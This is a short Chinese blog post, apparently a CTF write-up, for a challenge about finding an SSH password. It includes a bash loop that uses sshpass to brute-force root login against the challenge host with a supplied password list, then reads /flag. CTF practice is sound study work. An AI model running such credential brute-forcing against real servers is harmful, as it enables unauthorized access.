SSH的密码qsnctfwp

  1. 开启 kali,在终端输入ssh root@challenge.qsnctf.com -p [port]可以访问远程 SSH 系统
  2. 根据提供的 passlist.txt 文件内容进行密码爆破
  3. 编写 Shell 脚本
    #!/bin/bash
    while IFS= read -r PASSWORD
    do
      sshpass -p "$PASSWORD" ssh -t -t "root@challenge.qsnctf.com" -p 10538
      if [ $? -eq 0 ]; then
    	echo "登录成功!密码为: $PASSWORD"
    	exit 0
      fi
    done < "passlist.txt"
    
    echo "登录失败!"
    
  4. 设置脚本权限,使用命令chmod 777 [shellname].sh
  5. 获得密码后进入 Alpine 系统
  6. 根据提示 flag 在根目录,使用命令cat /flag即可获取flag

-End-

posted @ 2023-05-09 21:14  SRIGT  阅读(106)  评论(0编辑  收藏  举报